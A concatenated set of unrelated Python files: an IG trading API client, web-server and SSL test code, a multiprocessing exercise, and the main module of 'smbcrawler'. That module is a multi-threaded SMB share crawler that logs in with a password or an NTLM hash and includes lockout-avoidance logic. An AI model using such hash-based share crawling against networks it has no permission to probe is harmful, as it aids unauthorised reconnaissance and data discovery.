df['Low'] = df[['lowPrice.bid', 'lowPrice.ask']].mean(axis=1)
df['Close'] = df[['closePrice.bid', 'closePrice.ask']].mean(axis=1)
df = df.drop(columns=['snapshotTime', 'openPrice.lastTraded', 'closePrice.lastTraded',
'highPrice.lastTraded', 'lowPrice.lastTraded',
"openPrice.bid", "openPrice.ask",
"closePrice.bid", "closePrice.ask",
"highPrice.bid", "highPrice.ask",
"lowPrice.bid", "lowPrice.ask"])
df = df.rename(columns={"lastTradedVolume": "Volume"})
return df
def fetch_historical_prices_by_epic(
self,
epic,
resolution=None,
start_date=None,
end_date=None,
numpoints=None,
pagesize=20,
session=None,
format=None,
wait=1
):
"""
Fetches historical prices for the given epic.
This method wraps the IG v3 /prices/{epic} endpoint. With this method you can
choose to get either a fixed number of prices in the past, or to get the
prices between two points in time. By default it will return the last 10
prices at 1 minute resolution.
If the result set spans multiple 'pages', this method will automatically
get all the results and bundle them into one object.
:param epic: (str) The epic key for which historical prices are being
requested
:param resolution: (str, optional) timescale resolution. Expected values
are 1Min, 2Min, 3Min, 5Min, 10Min, 15Min, 30Min, 1H, 2H, 3H, 4H, D,
W, M. Default is 1Min
:param start_date: (datetime, optional) date range start, format
yyyy-MM-dd'T'HH:mm:ss
:param end_date: (datetime, optional) date range end, format
yyyy-MM-dd'T'HH:mm:ss
:param numpoints: (int, optional) number of data points. Default is 10
:param pagesize: (int, optional) number of data points. Default is 20
:param session: (Session, optional) session object
:param format: (function, optional) function to convert the raw
JSON response
:param wait: (int, optional) how many seconds to wait between successive
calls in a multi-page scenario. Default is 1
:returns: Pandas DataFrame if configured, otherwise a dict
:raises Exception: raises an exception if any error is encountered
"""
version = "3"
params = {}
if resolution and self.return_dataframe:
params["resolution"] = conv_resol(resolution)
if start_date:
params["from"] = start_date
if end_date:
params["to"] = end_date
if numpoints:
params["max"] = numpoints
params["pageSize"] = pagesize
url_params = {"epic": epic}
endpoint = "/prices/{epic}".format(**url_params)
action = "read"
prices = []
pagenumber = 1
more_results = True
while more_results:
params["pageNumber"] = pagenumber
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
prices.extend(data["prices"])
page_data = data["metadata"]["pageData"]
if page_data["totalPages"] == 0 or \
(page_data["pageNumber"] == page_data["totalPages"]):
more_results = False
else:
pagenumber += 1
time.sleep(wait)
data["prices"] = prices
if format is None:
format = self.format_prices
if self.return_dataframe:
data["prices"] = format(data["prices"], version)
data['prices'] = data['prices'].fillna(value=np.nan)
self.log_allowance(data["metadata"])
return data
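# Illustrative usage sketch (epic and dates are placeholders; `ig` is an authenticated
# IGService instance): ask either for the last N points or for a from/to window;
# paging is handled internally, sleeping `wait` seconds between page fetches.
#
#   history = ig.fetch_historical_prices_by_epic(
#       epic="CS.D.EURUSD.MINI.IP",
#       resolution="1H",
#       start_date="2022-01-03T00:00:00",
#       end_date="2022-01-07T00:00:00",
#   )
#   prices = history["prices"]     # hierarchical DataFrame with bid/ask (and last, if present)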
def fetch_historical_prices_by_epic_and_num_points(self, epic, resolution,
numpoints, session=None,
format=None):
"""Returns a list of historical prices for the given epic, resolution,
number of points"""
version = "2"
if self.return_dataframe:
resolution = conv_resol(resolution)
params = {}
url_params = {"epic": epic, "resolution": resolution, "numpoints": numpoints}
endpoint = "/prices/{epic}/{resolution}/{numpoints}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if format is None:
format = self.format_prices
if self.return_dataframe:
data["prices"] = format(data["prices"], version)
data['prices'] = data['prices'].fillna(value=np.nan)
return data
def fetch_historical_prices_by_epic_and_date_range(
self, epic, resolution, start_date, end_date, session=None, format=None, version='2'
):
"""
Returns a list of historical prices for the given epic, resolution, multiplier and date range. Supports
both versions 1 and 2
:param epic: IG epic
:type epic: str
:param resolution: timescale for returned data. Expected values 'M', 'D', '1H' etc
:type resolution: str
:param start_date: start date for returned data. For v1, format '2020:09:01-00:00:00', for v2 use
'2020-09-01 00:00:00'
:type start_date: str
:param end_date: end date for returned data. For v1, format '2020:09:01-00:00:00', for v2 use
'2020-09-01 00:00:00'
:type end_date: str
:param session: HTTP session
:type session: requests.Session
:param format: function defining how the historic price data should be converted into a Dataframe
:type format: function
:param version: API method version
:type version: str
:return: historic data
:rtype: dict, with 'prices' element as pandas.DataFrame
"""
if self.return_dataframe:
resolution = conv_resol(resolution)
params = {}
if version == '1':
start_date = conv_datetime(start_date, version)
end_date = conv_datetime(end_date, version)
params = {"startdate": start_date, "enddate": end_date}
url_params = {"epic": epic, "resolution": resolution}
endpoint = "/prices/{epic}/{resolution}".format(**url_params)
else:
url_params = {"epic": epic, "resolution": resolution, "startDate": start_date, "endDate": end_date}
endpoint = "/prices/{epic}/{resolution}/{startDate}/{endDate}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
del self.session.headers["VERSION"]
data = self.parse_response(response.text)
if format is None:
format = self.format_prices
if self.return_dataframe:
data["prices"] = format(data["prices"], version)
data['prices'] = data['prices'].fillna(value=np.nan)
return data
def log_allowance(self, data):
remaining_allowance = data['allowance']['remainingAllowance']
allowance_expiry_secs = data['allowance']['allowanceExpiry']
allowance_expiry = datetime.today() + timedelta(seconds=allowance_expiry_secs)
logger.info("Historic price data allowance: %s remaining until %s" %
(remaining_allowance, allowance_expiry))
# -------- END -------- #
# -------- WATCHLISTS -------- #
def fetch_all_watchlists(self, session=None):
"""Returns all watchlists belonging to the active account"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
endpoint = "/watchlists"
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data = pd.DataFrame(data["watchlists"])
return data
def create_watchlist(self, name, epics, session=None):
"""Creates a watchlist"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {"name": name, "epics": epics}
endpoint = "/watchlists"
action = "create"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
return data
def delete_watchlist(self, watchlist_id, session=None):
"""Deletes a watchlist"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
url_params = {"watchlist_id": watchlist_id}
endpoint = "/watchlists/{watchlist_id}".format(**url_params)
action = "delete"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
return data
def fetch_watchlist_markets(self, watchlist_id, session=None):
"""Returns the given watchlist's markets"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
url_params = {"watchlist_id": watchlist_id}
endpoint = "/watchlists/{watchlist_id}".format(**url_params)
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
if self.return_dataframe:
data = pd.DataFrame(data["markets"])
return data
def add_market_to_watchlist(self, watchlist_id, epic, session=None):
"""Adds a market to a watchlist"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {"epic": epic}
url_params = {"watchlist_id": watchlist_id}
endpoint = "/watchlists/{watchlist_id}".format(**url_params)
action = "update"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
return data
def remove_market_from_watchlist(self, watchlist_id, epic, session=None):
"""Remove a market from a watchlist"""
self.non_trading_rate_limit_pause_or_pass()
version = "1"
params = {}
url_params = {"watchlist_id": watchlist_id, "epic": epic}
endpoint = "/watchlists/{watchlist_id}/{epic}".format(**url_params)
action = "delete"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
return data
# -------- END -------- #
# -------- LOGIN -------- #
def logout(self, session=None):
"""Log out of the current session"""
version = "1"
params = {}
endpoint = "/session"
action = "delete"
self._req(action, endpoint, params, session, version)
self.session.close()
self._exit_bucket_threads()
def get_encryption_key(self, session=None):
"""Get encryption key to encrypt the password"""
endpoint = "/session/encryptionKey"
session = self._get_session(session)
response = session.get(self.BASE_URL + endpoint)
if not response.ok:
raise IGException("Could not get encryption key for login.")
data = response.json()
return data["encryptionKey"], data["timeStamp"]
def encrypted_password(self, session=None):
"""Encrypt password for login"""
key, timestamp = self.get_encryption_key(session)
rsakey = RSA.importKey(b64decode(key))
string = self.IG_PASSWORD + "|" + str(int(timestamp))
message = b64encode(string.encode())
return b64encode(PKCS1_v1_5.new(rsakey).encrypt(message)).decode()
def create_session(self, session=None, encryption=False, version='2'):
"""
Creates a session, obtaining tokens for subsequent API access
** April 2021 v3 has been implemented, but is not the default for now
:param session: HTTP session
:type session: requests.Session
:param encryption: whether or not the password should be encrypted. Required for some regions
:type encryption: Boolean
:param version: API method version
:type version: str
:return: JSON response body, parsed into dict
:rtype: dict
"""
if version == '3' and self.ACC_NUMBER is None:
raise IGException('Account number must be set for v3 sessions')
logging.info(f"Creating new v{version} session for user '{self.IG_USERNAME}' at '{self.BASE_URL}'")
password = self.encrypted_password(session) if encryption else self.IG_PASSWORD
params = {"identifier": self.IG_USERNAME, "password": password}
if encryption:
params["encryptedPassword"] = True
endpoint = "/session"
action = "create"
response = self._req(action, endpoint, params, session, version, check=False)
self._manage_headers(response)
data = self.parse_response(response.text)
if self._use_rate_limiter:
self.setup_rate_limiter()
return data
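# Illustrative sketch (assumption): v1/v2 logins authenticate via the CST and
# X-SECURITY-TOKEN headers, while a v3 login (which requires acc_number) uses short-lived
# OAuth tokens that _check_session() refreshes before each request. Credentials below
# are placeholders.
#
#   # v2 (default) -- header-token session
#   ig.create_session()
#
#   # v3 -- OAuth session; the account number must be passed to the constructor
#   ig_v3 = IGService("my_username", "my_password", "my_api_key",
#                     acc_type="demo", acc_number="ABC123")
#   ig_v3.create_session(version='3')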
def refresh_session(self, session=None, version='1'):
"""
Refreshes a v3 session. Tokens only last for 60 seconds, so need to be renewed regularly
:param session: HTTP session object
:type session: requests.Session
:param version: API method version
:type version: str
:return: HTTP status code
:rtype: int
"""
logging.info(f"Refreshing session '{self.IG_USERNAME}'")
params = {"refresh_token": self._refresh_token}
endpoint = "/session/refresh-token"
action = "create"
response = self._req(action, endpoint, params, session, version, check=False)
self._handle_oauth(json.loads(response.text))
return response.status_code
def _manage_headers(self, response):
"""
Manages authentication headers - different behaviour depending on the session creation version
:param response: HTTP response
:type response: requests.Response
"""
# handle v1 and v2 logins
handle_session_tokens(response, self.session)
# handle v3 logins
if response.text:
self.session.headers.update({'IG-ACCOUNT-ID': self.ACC_NUMBER})
payload = json.loads(response.text)
if 'oauthToken' in payload:
self._handle_oauth(payload['oauthToken'])
def _handle_oauth(self, oauth):
"""
Handle the v3 headers during session creation and refresh
:param oauth: 'oauth' portion of the response body
:type oauth: dict
"""
access_token = oauth['access_token']
token_type = oauth['token_type']
self.session.headers.update({'Authorization': f"{token_type} {access_token}"})
self._refresh_token = oauth['refresh_token']
validity = int(oauth['expires_in'])
self._valid_until = datetime.now() + timedelta(seconds=validity)
def _check_session(self):
"""
Check the v3 session status before making an API request:
- v3 tokens only last for 60 seconds
- if possible, the session can be renewed with a special refresh token
- if not, a new session will be created
"""
logging.debug("Checking session status...")
if self._valid_until is not None and datetime.now() > self._valid_until:
if self._refresh_token:
# we are in a v3 session, need to refresh
try:
logging.info("Current session has expired, refreshing...")
self.refresh_session()
except IGException:
logging.info("Refresh failed, logging in again...")
self._refresh_token = None
self._valid_until = None
del self.session.headers['Authorization']
self.create_session(version='3')
def switch_account(self, account_id, default_account, session=None):
"""Switches active accounts, optionally setting the default account"""
version = "1"
params = {"accountId": account_id, "defaultAccount": default_account}
endpoint = "/session"
action = "update"
response = self._req(action, endpoint, params, session, version)
self._manage_headers(response)
data = self.parse_response(response.text)
return data
def read_session(self, fetch_session_tokens='false', session=None):
"""Retrieves current session details"""
version = "1"
params = {"fetchSessionTokens": fetch_session_tokens}
endpoint = "/session"
action = "read"
response = self._req(action, endpoint, params, session, version)
if not response.ok:
raise IGException("Error in read_session() %s" % response.status_code)
data = self.parse_response(response.text)
return data
# -------- END -------- #
# -------- GENERAL -------- #
def get_client_apps(self, session=None):
"""Returns a list of client-owned applications"""
version = "1"
params = {}
endpoint = "/operations/application"
action = "read"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
return data
def update_client_app(
self,
allowance_account_overall,
allowance_account_trading,
api_key,
status,
session=None,
):
"""Updates an application"""
version = "1"
params = {
"allowanceAccountOverall": allowance_account_overall,
"allowanceAccountTrading": allowance_account_trading,
"apiKey": api_key,
"status": status,
}
endpoint = "/operations/application"
action = "update"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
return data
def disable_client_app_key(self, session=None):
"""
Disables the current application key from processing further requests.
Disabled keys may be re-enabled via the My Account section on
the IG Web Dealing Platform.
"""
version = "1"
params = {}
endpoint = "/operations/application/disable"
action = "update"
response = self._req(action, endpoint, params, session, version)
data = self.parse_response(response.text)
return data
# -------- END -------- #
def handle_session_tokens(response, session):
"""
Copy session tokens from response to headers, so they will be present for all future requests
:param response: HTTP response object
:type response: requests.Response
:param session: HTTP session object
:type session: requests.Session
"""
if "CST" in response.headers:
session.headers.update({'CST': response.headers['CST']})
if "X-SECURITY-TOKEN" in response.headers:
session.headers.update({'X-SECURITY-TOKEN': response.headers['X-SECURITY-TOKEN']})
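# Hedged usage sketch (added for illustration, not part of the original
# client): exercises handle_session_tokens() with a stand-in response object,
# showing how the CST and X-SECURITY-TOKEN headers end up attached to the
# shared requests.Session for every subsequent request.
if __name__ == "__main__":
    import requests
    class _FakeResponse:
        # only the two headers the function inspects are provided here
        headers = {"CST": "demo-cst", "X-SECURITY-TOKEN": "demo-xst"}
    _demo_session = requests.Session()
    handle_session_tokens(_FakeResponse(), _demo_session)
    assert _demo_session.headers["CST"] == "demo-cst"
    assert _demo_session.headers["X-SECURITY-TOKEN"] == "demo-xst"
    print("session now carries CST and X-SECURITY-TOKEN headers")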
|
test_app.py
|
import contextlib
import io
import sys
import time
import unittest
import unittest.mock
import importlib
import requests
import simple_web_server
from threading import Thread
class TestApp(unittest.TestCase):
@contextlib.contextmanager
def _capture_output(self):
new_out, new_err = io.StringIO(), io.StringIO()
old_out, old_err = sys.stdout, sys.stderr
try:
sys.stdout, sys.stderr = new_out, new_err
yield sys.stdout, sys.stderr
finally:
sys.stdout, sys.stderr = old_out, old_err
def test_app(self):
# capture output to test on
with self._capture_output() as (out, err):
importlib.reload(simple_web_server)
web_server_thread = Thread(target=simple_web_server.start_server, args=(), daemon=True)
web_server_thread.start()
# Need a delay to allow some time for the threads to start
time.sleep(2)
res = requests.get('http://localhost:9001')
# Pull info out of stdout since this app uses the cs.py log
# function. This means the logs are converted to prints and
# go to stdout
output = out.getvalue().strip()
# if the test passed, response should have the http get reply and logs
# should have captured in output
self.assertIn('Starting Server:', output)
self.assertIn('Received Get request:', output)
self.assertIn('Web Message is: Hello World from Cradlepoint router!', output)
self.assertNotIn('Exception occurred!', output)
self.assertEquals(200, res.status_code)
self.assertIn('Hello World from Cradlepoint router!', res.text)
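# Hedged helper sketch (not part of the original test): polling the port is
# usually more robust than the fixed two-second sleep used in test_app() above.
# The default port 9001 mirrors the URL requested there and is an assumption
# about how simple_web_server is configured.
def wait_for_port(port=9001, host="localhost", timeout=10.0):
    import socket
    deadline = time.time() + timeout
    while time.time() < deadline:
        try:
            with socket.create_connection((host, port), timeout=0.5):
                return True
        except OSError:
            time.sleep(0.1)
    return False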
|
app.py
|
import multiprocessing
import threading
import sys
import logging
from multiprocessing.dummy import Pool as ThreadPool
import smbcrawler.monkeypatch # noqa monkeypatch impacket scripts
from smbcrawler.io import get_targets, output_files_are_writeable, \
DataCollector
from smbcrawler.scanner import CrawlerThread
from smbcrawler.args import parse_args
from smbcrawler.log import init_log
from impacket.smbconnection import SessionError
log = None
class Login(object):
def __init__(self, username, domain, password="", hash=""):
self.username = username
self.domain = domain
self.password = password
try:
self.lmhash = hash.split(':')[0]
self.nthash = hash.split(':')[1]
except (IndexError, AttributeError):
self.nthash = ""
self.lmhash = ""
class ThreadManager(object):
"""Manages the crawler threads
:global_manager: A multiprocessing.Manager object to manage shared
variables
:total_targets: The number of total targets
:kill_app: callback function taking no arguments that communicates to
the parent app that we want to quit
"""
def __init__(self, global_manager, total_targets, kill_app, is_domain,
force):
self.total_targets = total_targets
self.kill_app = kill_app
self.is_domain = is_domain
self.force = force
self.threads = []
self.shared_vars = global_manager.dict()
self.shared_vars['scanned'] = 0
self.shared_vars['unpaused_threads'] = 0
self.shared_vars['credentials_confirmed'] = False
self.all_paused = global_manager.Event()
self.running = global_manager.Event()
self.running.set()
def pause(self):
print("Pausing threads... be patient")
self.running.clear()
self.all_paused.wait()
print("Threads paused. ", end='')
self.print_progress()
print("\ts <n>\tSkip share in thread <n>")
print("\tk <n>\tKill thread <n> and proceed with next target")
print("\tr\tResume crawler")
print("\tq\tWrite output files and quit")
print("Threads:")
for i, t in enumerate(self.threads):
host = t.target.host
print("\t%d) \\\\%s\\%s" % (
i, host, t.current_share or "",
))
self.show_menu()
def show_menu(self):
cmd = ""
commands = {
'k': self.kill_thread,
's': self.skip_share,
'q': self.quit,
'r': self.resume,
}
while True:
cmd = input("> ")
arg = None
if " " in cmd:
cmd, arg = cmd.split()[:2]
if cmd in commands.keys():
if arg:
if commands[cmd](arg):
break
else:
if commands[cmd]():
break
else:
print("Unkown command: %s" % cmd)
def skip_share(self, n=None):
if not n:
log.error("Missing argument")
return False
try:
self.threads[int(n)].skip_share()
except (IndexError, ValueError):
log.error("Invalid argument: %s" % n)
return False
self.resume()
return True
def kill_thread(self, n=None):
if not n:
log.error("Missing argument")
return False
try:
self.threads[int(n)].kill()
except (IndexError, ValueError):
log.error("Invalid argument: %s" % n)
return False
self.resume()
return True
def quit(self):
for i, t in enumerate(self.threads):
t.kill()
self.kill_app()
self.resume(msg="Quitting...")
return True
def resume(self, msg="Resuming..."):
print(msg)
self.all_paused.clear()
self.running.set()
return True
def check_paused(self, thread):
if not self.running.is_set():
self.shared_vars['unpaused_threads'] -= 1
if self.shared_vars['unpaused_threads'] == 0:
self.all_paused.set()
self.running.wait()
self.shared_vars['unpaused_threads'] += 1
def add(self, thread):
self.threads.append(thread)
self.shared_vars['unpaused_threads'] += 1
def remove(self, thread):
self.threads.remove(thread)
self.shared_vars['scanned'] += 1
self.shared_vars['unpaused_threads'] -= 1
def print_progress(self):
message = ""
if self.total_targets > 0:
scanned = self.shared_vars['scanned']
message = "Processed %d out of %d hosts (%.2f%%)" % (
scanned,
self.total_targets,
100.*scanned/self.total_targets,
)
print(message)
def report_logon_failure(self, target):
if (
not self.shared_vars['credentials_confirmed']
and not self.force
and self.is_domain
):
log.fatal("%s:%d - Logon failure; "
"aborting to prevent account lockout; "
"consider using --force to continue anyway"
% (target.host, target.port))
self.quit()
else:
log.warning("%s:%d - Logon failure" % (target.host, target.port))
def confirm_credentials(self):
self.shared_vars['credentials_confirmed'] = True
class CrawlerApp(object):
def __init__(self, global_manager, args):
self.args = args
self.sanity_check()
self.targets = get_targets(
self.args.target,
self.args.inputfilename,
self.args.timeout,
)
self.login = Login(
self.args.user,
self.args.domain,
password=self.args.password,
hash=self.args.hash,
)
self.output = DataCollector(self.args)
self.thread_manager = ThreadManager(
global_manager,
len(self.targets),
self.kill,
self.args.domain not in ['', '.'],
self.args.force,
)
self.killed = False
def kill(self):
self.killed = True
def sanity_check(self):
if not self.args.target and not self.args.inputfilename:
log.critical("You must supply a target or an input filename "
"(or both)")
exit(1)
if not output_files_are_writeable(self.args):
log.critical("Aborting because output file could not be written. "
"This is just going to waste everybody's time.")
exit(1)
if not self.args.no_output and all(x is None for x in [
self.args.outputfilename_xml,
self.args.outputfilename_json,
self.args.outputfilename_log,
self.args.outputfilename_grep,
]):
log.critical("Aborting because not output file name was given. "
"This is just going to waste everybody's time. "
"Use the -oN parameter to proceed anyway.")
exit(1)
def run(self):
t = threading.Thread(target=self.input_thread)
        t.daemon = True
t.start()
pool = ThreadPool(self.args.threads) # Number of threads
try:
pool.map(self.worker, self.targets)
except Exception as e:
log.exception(e)
log.fatal("Exception caught, trying to write output...")
except KeyboardInterrupt:
log.info("CTRL-C caught, "
"trying to exit gracefully and write output...")
self.thread_manager.quit()
pass
self.output.write_output()
sys.exit(0)
def read_key(self):
import termios
fd = sys.stdin.fileno()
old = termios.tcgetattr(fd)
new = termios.tcgetattr(fd)
new[3] &= ~(termios.ICANON | termios.ECHO) # c_lflags
c = None
try:
termios.tcsetattr(fd, termios.TCSANOW, new)
c = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSANOW, old)
return c
def input_thread(self):
"""Runs in a separate thread and only registers key events"""
while True:
key = self.read_key()
if key == "p":
self.thread_manager.pause()
if key == " ":
self.thread_manager.print_progress()
def worker(self, target):
if self.killed:
return
thread = CrawlerThread(target, self.thread_manager, self.output,
self.login, self.args)
self.thread_manager.add(thread)
try:
thread.run()
except Exception as e:
if (isinstance(e, SessionError) and
'STATUS_LOGON_FAILURE' in str(e)):
self.thread_manager.report_logon_failure(target)
else:
if log.level == logging.DEBUG:
log.exception(e)
else:
log.error(e)
self.thread_manager.remove(thread)
def main(args=None):
parsed_args = parse_args(args)
init_log(parsed_args)
global log
log = logging.getLogger(__name__)
cmd_args = ' '.join(args or sys.argv[1:])
log.info("Starting up with these arguments: " + cmd_args)
global_manager = multiprocessing.Manager()
CrawlerApp(global_manager, parsed_args).run()
|
live_server.py
|
import logging
import multiprocessing
import os
import signal
import socket
import time
import pytest
from ._internal import deprecated
class LiveServer:
"""The helper class used to manage a live server. Handles creation and
stopping application in a separate process.
:param app: The application to run.
    :param host: The host to listen on (default localhost).
    :param port: The port on which to run the application.
    :param wait: The timeout in seconds after which the test case is aborted
        if the application has not started.
"""
def __init__(self, app, host, port, wait, clean_stop=False):
self.app = app
self.port = port
self.host = host
self.wait = wait
self.clean_stop = clean_stop
self._process = None
def start(self):
"""Start application in a separate process."""
def worker(app, host, port):
app.run(host=host, port=port, use_reloader=False, threaded=True)
self._process = multiprocessing.Process(
target=worker, args=(self.app, self.host, self.port)
)
self._process.daemon = True
self._process.start()
keep_trying = True
start_time = time.time()
while keep_trying:
elapsed_time = time.time() - start_time
if elapsed_time > self.wait:
pytest.fail(
"Failed to start the server after {!s} "
"seconds.".format(self.wait)
)
if self._is_ready():
keep_trying = False
def _is_ready(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((self.host, self.port))
except socket.error:
ret = False
else:
ret = True
finally:
sock.close()
return ret
def stop(self):
"""Stop application process."""
if self._process:
if self.clean_stop and self._stop_cleanly():
return
if self._process.is_alive():
# If it's still alive, kill it
self._process.terminate()
def _stop_cleanly(self, timeout=5):
"""Attempts to stop the server cleanly by sending a SIGINT signal and waiting for
``timeout`` seconds.
:return: True if the server was cleanly stopped, False otherwise.
"""
try:
os.kill(self._process.pid, signal.SIGINT)
self._process.join(timeout)
return True
except Exception as ex:
logging.error("Failed to join the live server process: %r", ex)
return False
def __repr__(self):
return "<LiveServer listening at %s>" % self.url()
|
ssl_test.py
|
#!/usr/bin/env python
"""Tests for API client + HTTPS server integration."""
from __future__ import absolute_import
from __future__ import unicode_literals
import datetime
import io
import os
import socket
import threading
from cryptography import x509
from cryptography.hazmat import backends
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography.x509 import oid
from http import server as http_server
import portpicker
import requests
import socketserver
from grr_api_client import api as grr_api
from grr_response_core.lib import flags
from grr_response_core.lib.rdfvalues import crypto as rdf_crypto
from grr_response_server.flows.general import processes
from grr_response_server.gui import api_auth_manager
from grr_response_server.gui import webauth
from grr_response_server.gui import wsgiapp_testlib
from grr.test_lib import acl_test_lib
from grr.test_lib import fixture_test_lib
from grr.test_lib import test_lib
class ApiSslServerTestBase(test_lib.GRRBaseTest, acl_test_lib.AclTestMixin):
def setUp(self):
super(ApiSslServerTestBase, self).setUp()
key = rdf_crypto.RSAPrivateKey.GenerateKey()
key_path = os.path.join(self.temp_dir, "key.pem")
with open(key_path, "wb") as f:
f.write(key.AsPEM())
subject = issuer = x509.Name([
x509.NameAttribute(oid.NameOID.COMMON_NAME, u"localhost"),
])
cert = x509.CertificateBuilder().subject_name(subject).issuer_name(
issuer).public_key(key.GetPublicKey().GetRawPublicKey()).serial_number(
x509.random_serial_number()).not_valid_before(
datetime.datetime.utcnow()).not_valid_after(
datetime.datetime.utcnow() +
datetime.timedelta(days=1)).add_extension(
x509.SubjectAlternativeName(
[x509.DNSName(u"localhost")]),
critical=False,
).sign(key.GetRawPrivateKey(), hashes.SHA256(),
backends.default_backend())
self.cert_path = os.path.join(self.temp_dir, "certificate.pem")
with open(self.cert_path, "wb") as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
self.config_overrider = test_lib.ConfigOverrider({
"AdminUI.enable_ssl": True,
"AdminUI.ssl_key_file": key_path,
"AdminUI.ssl_cert_file": self.cert_path,
})
self.config_overrider.Start()
self.port = portpicker.PickUnusedPort()
self.thread = wsgiapp_testlib.ServerThread(self.port)
self.thread.StartAndWaitUntilServing()
api_auth_manager.APIACLInit.InitApiAuthManager()
self.token.username = "api_test_robot_user"
webauth.WEBAUTH_MANAGER.SetUserName(self.token.username)
self.endpoint = "https://localhost:%s" % self.port
def tearDown(self):
super(ApiSslServerTestBase, self).tearDown()
self.config_overrider.Stop()
self.thread.keep_running = False
class ApiSslE2ETestMixin(object):
def testGetClientWorks(self):
# By testing GetClient we test a simple GET method.
client_urn = self.SetupClient(0)
c = self.api.Client(client_id=client_urn.Basename()).Get()
self.assertEqual(c.client_id, client_urn.Basename())
def testSearchClientWorks(self):
# By testing SearchClients we test an iterator-based API method.
clients = list(self.api.SearchClients(query="."))
self.assertEqual(clients, [])
def testPostMethodWorks(self):
client_urn = self.SetupClient(0)
args = processes.ListProcessesArgs(
filename_regex="blah", fetch_binaries=True)
client_ref = self.api.Client(client_id=client_urn.Basename())
result_flow = client_ref.CreateFlow(
name=processes.ListProcesses.__name__, args=args.AsPrimitiveProto())
self.assertTrue(result_flow.client_id)
def testDownloadingFileWorks(self):
client_urn = self.SetupClient(0)
fixture_test_lib.ClientFixture(client_urn, self.token)
out = io.BytesIO()
self.api.Client(client_id=client_urn.Basename()).File(
"fs/tsk/c/bin/rbash").GetBlob().WriteToStream(out)
self.assertTrue(out.getvalue())
class ApiSslWithoutCABundleTest(ApiSslServerTestBase):
def testConnectionFails(self):
client_urn = self.SetupClient(0)
api = grr_api.InitHttp(api_endpoint=self.endpoint)
with self.assertRaises(requests.exceptions.SSLError):
api.Client(client_id=client_urn.Basename()).Get()
class ApiSslWithEnvVarWithoutMergingTest(ApiSslServerTestBase):
def testConnectionFails(self):
client_urn = self.SetupClient(0)
api = grr_api.InitHttp(api_endpoint=self.endpoint, trust_env=False)
with self.assertRaises(requests.exceptions.SSLError):
api.Client(client_id=client_urn.Basename()).Get()
class ApiSslWithConfigurationInEnvVarsE2ETest(ApiSslServerTestBase,
ApiSslE2ETestMixin):
def setUp(self):
super(ApiSslWithConfigurationInEnvVarsE2ETest, self).setUp()
self.prev_environ = dict(os.environ)
os.environ["REQUESTS_CA_BUNDLE"] = self.cert_path
self.api = grr_api.InitHttp(api_endpoint=self.endpoint)
def tearDown(self):
super(ApiSslWithConfigurationInEnvVarsE2ETest, self).tearDown()
os.environ.clear()
os.environ.update(self.prev_environ)
class ApiSslWithWithVerifyFalseE2ETest(ApiSslServerTestBase,
ApiSslE2ETestMixin):
def setUp(self):
super(ApiSslWithWithVerifyFalseE2ETest, self).setUp()
self.api = grr_api.InitHttp(api_endpoint=self.endpoint, verify=False)
class ApiSslWithWithVerifyPointingToCABundleTest(ApiSslServerTestBase,
ApiSslE2ETestMixin):
def setUp(self):
super(ApiSslWithWithVerifyPointingToCABundleTest, self).setUp()
self.api = grr_api.InitHttp(
api_endpoint=self.endpoint, verify=self.cert_path)
class Proxy(http_server.SimpleHTTPRequestHandler):
requests = []
def do_CONNECT(self): # pylint: disable=invalid-name
self.__class__.requests.append(self.requestline)
class TCPServerV6(socketserver.TCPServer):
address_family = socket.AF_INET6
class ApiSslProxyTest(ApiSslServerTestBase):
def setUp(self):
super(ApiSslProxyTest, self).setUp()
attempts_count = 0
self.proxy_server = None
while self.proxy_server is None:
try:
self.proxy_port = portpicker.PickUnusedPort()
self.proxy_server = TCPServerV6(("::", self.proxy_port), Proxy)
except socket.error:
attempts_count += 1
if attempts_count == 10:
self.fail("Can't initialize proxy server.")
threading.Thread(target=self.proxy_server.serve_forever).start()
def tearDown(self):
super(ApiSslProxyTest, self).tearDown()
self.proxy_server.shutdown()
self.proxy_server.server_close()
def testProxyConnection(self):
client_urn = self.SetupClient(0)
api = grr_api.InitHttp(
api_endpoint=self.endpoint,
proxies={"https": "localhost:%d" % self.proxy_port})
with self.assertRaises(requests.exceptions.ConnectionError):
api.Client(client_id=client_urn.Basename()).Get()
# CONNECT request should point to GRR SSL server.
self.assertEqual(Proxy.requests,
["CONNECT localhost:%d HTTP/1.0" % self.port])
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
flags.StartMain(main)
|
soal1.py
|
import random
import time
import multiprocessing
def SoalA():
for i in range(10,20):
if i%2 == 1:
print("==Proses 1=>-----",i)
time.sleep(random.randrange(1,2))
def SoalB():
for i in range(2,12):
for o in range(2,i):
if i%o == 0:
break
else:
print("==Proses 2=>--------",i)
time.sleep(random.randrange(1,2))
def SoalC():
for i in range(50,60):
if i%2==1:
print("==Proses 3=>-----------",i)
time.sleep(random.randrange(1,2))
def SoalD():
for i in range(0,5):
print("==Proses 4=>--------------",random.randrange(100,200))
time.sleep(random.randrange(1,2))
if __name__ == "__main__":
worker1 = multiprocessing.Process(target=SoalA)
worker2 = multiprocessing.Process(target=SoalB)
worker3 = multiprocessing.Process(target=SoalC)
worker4 = multiprocessing.Process(target=SoalD)
worker1.start()
worker2.start()
worker3.start()
worker4.start()
worker1.join()
worker2.join()
worker3.join()
worker4.join()
|
server.py
|
